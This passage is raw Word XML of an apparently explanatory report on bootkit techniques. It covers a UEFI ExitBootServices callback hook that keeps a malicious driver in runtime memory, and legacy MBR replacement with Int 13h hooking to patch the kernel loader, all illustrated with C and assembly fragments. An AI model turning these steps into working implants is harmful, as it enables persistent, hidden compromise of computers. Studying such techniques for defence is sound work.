          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>TPL_HIGH_LEVEL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Priority level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34341617" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1962"/>
          <w:tab w:val="center" w:pos="5152"/>
        </w:tabs>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ExitBootServicesCallbackHook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Our callback function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D404B2B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="706"/>
          <w:tab w:val="center" w:pos="4838"/>
        </w:tabs>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Event context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36909028" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1596"/>
          <w:tab w:val="center" w:pos="4681"/>
        </w:tabs>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ExitBootServicesEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Event handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F718B5" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7BD137" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why is this vulnerable? </w:t>
      </w:r>
      <w:r>
        <w:t>The UEFI boot services are designed to be called by any legitimate EFI application. There is no authentication of who registered the callback—the firmware simply executes all registered callbacks in sequence before control transfers to the OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7515EF50" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step 3: Payload Allocation in Persistent Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658AC313" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>Inside the callback hook, before control transfers to the OS, the malicious code executes these critical steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176AA937" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve">// Inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>ExitBootServicesCallbackHook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71EA5960" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">EFI_PHYSICAL_ADDRESS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PayloadAddr</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color w:val="40A170"/>
        </w:rPr>
        <w:t>0x200000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve">// High physical address </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gBS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>AllocatePages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4673B322" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>AllocateAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FABF18C" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1648"/>
          <w:tab w:val="center" w:pos="5466"/>
        </w:tabs>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>EfiRuntimeServicesData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Memory type preserved through OS load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625E6BA9" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PayloadSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B55307F" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PayloadAddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E326CDF" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="122" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="2720" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>memcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="8F2100"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>*)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PayloadAddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>MaliciousDriver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PayloadSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F87A711" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="274"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The critical insight: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The memory type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>EfiRuntimeServicesData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is specifically designed to persist beyond the firmware-to-OS transition. The OS loader does not clear or reuse this memory region, and it becomes accessible to the kernel. By storing the malicious driver in this memory type, the payload survives into the running kernel environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3220FAFD" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2.1.3 Legacy BIOS Exploitation: Int 13h Interception </w:t>
      </w:r>
      <w:r>
        <w:t>On legacy systems without UEFI, the same goal is achieved via Master Boot Record (MBR) modification and interrupt hooking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36497E26" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: MBR Modification </w:t>
      </w:r>
      <w:r>
        <w:t>The attacker replaces the MBR on the system drive (first 512 bytes). This code executes before any OS code, with full hardware access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C794129" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: BIOS Interrupt Vector Table (IVT) Hooking </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> BIOS interrupt system (a legacy mechanism still partially supported) allows code to hook service interrupts. The malicious MBR hooks Interrupt 13h (Disk Services):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C59511" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>; Pseudocode: Int 13h Hook Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F4787B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4158"/>
        </w:tabs>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="007F00"/>
        </w:rPr>
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>0x13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>; Interrupt 13h (disk services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBECF36" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="123" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="007F00"/>
        </w:rPr>
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">IVT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>4</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b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t>di</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>; Point IVT entry to hook function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C20443A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>When the Windows Boot Loader (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>bootmgr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>winload.exe</w:t>
      </w:r>
      <w:r>
        <w:t>) requests to read sectors from disk, the hook intercepts these reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE6376B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: On-the-Fly Patching </w:t>
      </w:r>
      <w:r>
        <w:t>As the kernel loader is read from disk, the hook: 1. Reads the file header to identify it as the kernel loader 2. Appends the malicious shellcode to the end of the loader’s memory block 3. Modifies the loader’s entry point to jump to the shellcode first 4. Allows execution to proceed normally after shellcode completes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E8CF40" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="274"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why this design? </w:t>
      </w:r>
      <w:r>
        <w:t>The on-the-fly patching approach is robust because: - The loader still executes normally (avoiding integrity checks) - The shellcode runs in the loader’s context (Ring 0 access) - No persistent file modifications occur (the attack is volatile) - The kernel has no knowledge that code was added</w:t>
      </w:r>
    </w:p>
